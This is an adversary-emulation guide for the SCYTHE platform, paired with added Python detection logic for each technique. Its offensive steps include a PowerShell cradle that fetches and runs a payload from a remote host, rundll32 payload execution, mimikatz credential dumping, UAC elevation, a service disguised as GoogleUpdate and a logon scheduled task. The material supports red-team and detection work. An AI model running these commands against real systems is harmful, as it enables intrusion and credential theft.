SCYTHE

Setup Campaign

Log in to your SCYTHE instance via a web browser. The default port is 8443.
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is the default
    • DNS, HTTP, and Stego require relays to be installed on the redirector
    • Google Sheets and Twitter require a third-party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute it by double-clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download the DLL file from SCYTHE and execute the following from cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;
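Both delivery methods above hand a payload in a user-writable location to a signed Windows utility, which is exactly what endpoint telemetry should surface while the campaign runs. The Python below is an added example, not taken from the C2 Matrix page or from SCYTHE: it runs two checks over constructed process-creation events (the Image and CommandLine fields of Sysmon Event ID 1, or Security 4688 with command-line auditing): rundll32 given a DLL by bare name that is not a known System32 DLL or from a user-writable directory, and PowerShell command lines that combine download-cradle indicators with an EXE path under a user-writable directory. The DLL allowlist, the sample events and the placeholder URL are assumptions.

```python
"""Detection checks for the two payload-delivery methods above: rundll32
loading the SCYTHE DLL by bare name, and the PowerShell one-liner that
downloads an EXE into the Public profile and runs it.

Added example, not part of the C2 Matrix page or SCYTHE's own tooling. It
assumes process-creation telemetry with Image and CommandLine fields (Sysmon
Event ID 1, or Security 4688 with command-line auditing enabled). All sample
events below are constructed; the URL is a placeholder, not a real server.
"""
import re
from dataclasses import dataclass

# Locations a standard user can write to. A DLL or EXE launched from here by
# a signed system utility is the common thread in both delivery methods.
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")

# Demonstration allowlist of DLLs that rundll32 is routinely given by bare
# name (resolved from System32). In production, derive this from an
# inventory of the System32 directory rather than a hand-written set.
KNOWN_SYSTEM_DLLS = {"shell32.dll", "user32.dll", "advapi32.dll",
                     "printui.dll", "keymgr.dll", "inetcpl.cpl"}

# Fragments of a PowerShell download cradle; two or more together raise a finding.
CRADLE_PATTERNS = [re.compile(p, re.I) for p in (
    r"net\.webclient", r"downloadfile\(|downloadstring\(",
    r"invoke-webrequest|\biwr\b|\bcurl\b", r"https?://")]

RUNDLL32_ARGS = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^\s",]+)"?,(\S+)', re.I)
EXE_PATH = re.compile(r"""[a-z]:\\[^\s"';)]+\.exe""", re.I)


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # its command line as logged


def _user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE)


def rundll32_findings(ev: ProcessEvent) -> list[str]:
    """rundll32.exe <dll>,<export>: flag DLLs in user-writable locations and
    bare names that do not belong to a known System32 DLL."""
    if not ev.image.lower().endswith(r"\rundll32.exe"):
        return []
    m = RUNDLL32_ARGS.search(ev.command_line)
    if not m:
        return ["rundll32 launched without a dll,export argument"]
    dll, export = m.group(1), m.group(2)
    if _user_writable(dll):
        return [f"rundll32 loading {dll} (export {export}) from a user-writable path"]
    if "\\" not in dll and dll.lower() not in KNOWN_SYSTEM_DLLS:
        return [f"rundll32 loading non-system DLL {dll} by bare name (export {export})"]
    return []


def powershell_findings(ev: ProcessEvent) -> list[str]:
    """Flag download cradles and any EXE path inside a user-writable directory."""
    if not ev.image.lower().endswith((r"\powershell.exe", r"\pwsh.exe")):
        return []
    findings = []
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(ev.command_line)]
    if len(hits) >= 2:
        findings.append(f"PowerShell download cradle ({len(hits)} indicators: {hits})")
    for exe in EXE_PATH.findall(ev.command_line):
        if _user_writable(exe):
            findings.append(f"PowerShell references executable in user-writable path: {exe}")
            break
    return findings


def triage(events: list[ProcessEvent]) -> list[list[str]]:
    """Findings per event, index-aligned with the input."""
    return [rundll32_findings(ev) + powershell_findings(ev) for ev in events]


# Constructed sample telemetry: the two delivery methods from the page and
# one benign counterpart for each.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe ServiceLogin.dll,PlatformClientMain"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL hotplug.dll'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe $myscriptblock={$url="https://c2.example.test/ServiceLogin?active=PLACEHOLDER&b=false";'
                 r'$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";'
                 r'$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};'
                 r'Invoke-Command -ScriptBlock $myscriptblock;'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -NoProfile -Command "Get-Process | Out-File C:\Users\sec564\proc.txt"'),
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev.command_line[:60], "->", findings or "clean")
```

The bare-name rule is the one to tune: rundll32 is legitimately called with short DLL names all day, so the allowlist has to reflect the real System32 inventory, while the user-writable-path rule needs almost no tuning.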

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move the file to the virtual file system, then:
loader --load downloader
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords
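privilege::debug enables SeDebugPrivilege on the agent's token, and sekurlsa::logonPasswords then opens a read handle to lsass.exe; both steps leave telemetry that a detection should tie together. The Python below is an added example, not from the C2 Matrix page, SCYTHE or mimikatz: it correlates Security event 4703 (token right adjusted, showing SeDebugPrivilege being enabled) with Sysmon Event ID 10 (ProcessAccess on lsass.exe with PROCESS_VM_READ in GrantedAccess) per source process. The allowlist of legitimate LSASS readers and the sample events are constructed assumptions.

```python
"""Detection logic for the credential-dumping step above (privilege::debug
followed by sekurlsa::logonPasswords).

Added example, not part of the C2 Matrix page, SCYTHE or mimikatz. It assumes
two telemetry sources: Windows Security 4703 (token right adjusted, which
records SeDebugPrivilege being enabled for a process) and Sysmon Event ID 10
(ProcessAccess, which records a handle opened to lsass.exe together with the
GrantedAccess mask). The sample events are constructed.
"""
from collections import defaultdict

# Process access rights (winnt.h) relevant to reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

ACCESS_NAMES = {
    0x0001: "TERMINATE", 0x0008: "VM_OPERATION", PROCESS_VM_READ: "VM_READ",
    0x0020: "VM_WRITE", PROCESS_QUERY_INFORMATION: "QUERY_INFORMATION",
    PROCESS_QUERY_LIMITED_INFORMATION: "QUERY_LIMITED_INFORMATION",
}

# Processes that legitimately open LSASS with read access on most hosts.
# Demonstration allowlist only; tune it to the environment.
LSASS_READERS_ALLOWED = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def decode_access(mask_hex: str) -> list[str]:
    """Turn a GrantedAccess value such as '0x1010' into right names."""
    mask = int(mask_hex, 16)
    return [name for bit, name in sorted(ACCESS_NAMES.items()) if mask & bit]


def lsass_read_attempt(ev: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with VM_READ."""
    if ev.get("EventID") != 10:
        return False
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if ev["SourceImage"].lower() in LSASS_READERS_ALLOWED:
        return False
    return bool(int(ev["GrantedAccess"], 16) & PROCESS_VM_READ)


def debug_privilege_enabled(ev: dict) -> bool:
    return ev.get("EventID") == 4703 and "SeDebugPrivilege" in ev.get("EnabledPrivilegeList", "")


def score(events: list[dict]) -> dict[str, dict]:
    """Group by source process: an LSASS read alone is medium severity; the
    same process first enabling SeDebugPrivilege makes it high."""
    per_proc = defaultdict(lambda: {"debug_priv": False, "lsass_access": [], "severity": "none"})
    for ev in sorted(events, key=lambda e: e["ts"]):
        if debug_privilege_enabled(ev):
            per_proc[ev["ProcessName"].lower()]["debug_priv"] = True
        elif lsass_read_attempt(ev):
            rec = per_proc[ev["SourceImage"].lower()]
            rec["lsass_access"].append(decode_access(ev["GrantedAccess"]))
    for rec in per_proc.values():
        if rec["lsass_access"]:
            rec["severity"] = "high" if rec["debug_priv"] else "medium"
    return dict(per_proc)


LSASS = r"C:\Windows\System32\lsass.exe"
# Constructed sample telemetry: the agent process performing both steps,
# plus an allowlisted AV engine and a svchost that only queries LSASS.
SAMPLE_EVENTS = [
    {"ts": 1, "EventID": 4703, "ProcessName": r"C:\Users\Public\scythe_payload.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"ts": 2, "EventID": 10, "SourceImage": r"C:\Users\Public\scythe_payload.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"ts": 3, "EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"ts": 4, "EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for proc, rec in score(SAMPLE_EVENTS).items():
        print(proc, rec["severity"], rec["lsass_access"])
```

Because SCYTHE loads the mimikatz module into the agent's own process, the source image in both events is the payload dropped earlier (here the Public-profile EXE from the PowerShell delivery method), which is why correlating on the process rather than on the module name is the right grouping key.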

Persistence (TA0003)

New Service (T1050)

loader --load persist
Syntax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
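Both persistence mechanisms above produce events Windows logs on its own: System event 7045 for the new service, and Security event 4698 for the scheduled task when "Audit Other Object Access Events" is enabled. The Python below is an added example, not from the C2 Matrix page or SCYTHE's persist module: it normalizes the admin-share UNC path that the persist module writes into the service definition and parses the task's XML to flag a LOLBin action pointed at a user-writable path. The LOLBin set and the sample events are constructed assumptions.

```python
"""Detection checks for the two persistence mechanisms above: a service whose
binary lives in a temp directory, and a logon-triggered scheduled task that
runs rundll32 against a DLL inside a user profile.

Added example, not part of the C2 Matrix page or SCYTHE's persist module. It
assumes System event 7045 (service installed: ServiceName, ImagePath) and
Security event 4698 (scheduled task created: TaskName, TaskContent XML).
The sample events are constructed.
"""
import re
import xml.etree.ElementTree as ET

USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\", "c:\\temp\\")
# System utilities commonly used as a task action to launch something else.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "cmd.exe",
           "powershell.exe", "wscript.exe", "cscript.exe"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
WIN_PATH = re.compile(r'[a-z]:\\[^\s",]+', re.I)


def normalize_path(path: str) -> str:
    r"""Rewrite an admin-share UNC path (\\HOST\C$\dir) to its local form
    (C:\dir) so one rule also covers services created remotely, which is
    how the persist module installs them."""
    return re.sub(r"^\\\\[^\\]+\\([a-z])\$", r"\1:", path, flags=re.I)


def _first_path(text: str) -> str:
    """Executable path from a command string, quoted or not."""
    m = re.search(r'"([^"]+)"|(\S+)', text.strip())
    return (m.group(1) or m.group(2)) if m else ""


def service_findings(ev: dict) -> list[str]:
    """Event 7045: service binary installed in a user-writable location."""
    if ev.get("EventID") != 7045:
        return []
    image = normalize_path(_first_path(ev["ImagePath"]))
    if image.lower().startswith(USER_WRITABLE):
        return [f"service {ev['ServiceName']} installed with binary in user-writable path {image}"]
    return []


def task_findings(ev: dict) -> list[str]:
    """Event 4698: parse TaskContent and flag a LOLBin action pointed at a
    user-writable path; trigger types are reported for context."""
    if ev.get("EventID") != 4698:
        return []
    root = ET.fromstring(ev["TaskContent"])
    triggers = [t.tag.split("}")[-1] for t in root.findall("t:Triggers/*", TASK_NS)]
    findings = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", "", TASK_NS) or ""
        args = ex.findtext("t:Arguments", "", TASK_NS) or ""
        binary = _first_path(cmd).split("\\")[-1].lower()
        paths = [normalize_path(p) for p in WIN_PATH.findall(f"{cmd} {args}")]
        if binary in LOLBINS and any(p.lower().startswith(USER_WRITABLE) for p in paths):
            findings.append(f"task {ev['TaskName']} ({'/'.join(triggers)}) runs {binary} "
                            f"against a payload in a user-writable path")
    return findings


def triage(events: list[dict]) -> list[list[str]]:
    """Findings per event, index-aligned with the input."""
    return [service_findings(ev) + task_findings(ev) for ev in events]


# Constructed TaskContent XML in the shape Task Scheduler records in 4698.
SCYTHE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>cmd.exe</Command>
    <Arguments>/k rundll32.exe C:\Users\sec564\DNS_scythe_client32.dll,PlatformClientMain</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\wsqmcons.exe</Command>
  </Exec></Actions>
</Task>"""

SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "GoogleUpdate",
     "ImagePath": r"\\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe"},
    {"EventID": 7045, "ServiceName": "ExampleSvc",
     "ImagePath": r'"C:\Program Files\Example Vendor\svc.exe" -service'},
    {"EventID": 4698, "TaskName": r"\DNS", "TaskContent": SCYTHE_TASK_XML},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\CEIP\Consolidator",
     "TaskContent": BENIGN_TASK_XML},
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev.get("ServiceName") or ev.get("TaskName"), "->", findings or "clean")
```

The service rule deliberately ignores the service name: a name that imitates a vendor updater is a weak signal, whereas a service binary under Windows\Temp or a user profile is reliably wrong regardless of what it is called.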

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown